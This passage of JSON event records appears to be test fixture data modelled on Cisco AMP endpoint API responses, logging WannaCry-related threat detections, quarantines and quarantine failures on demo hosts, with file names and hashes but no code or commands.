Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":612000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 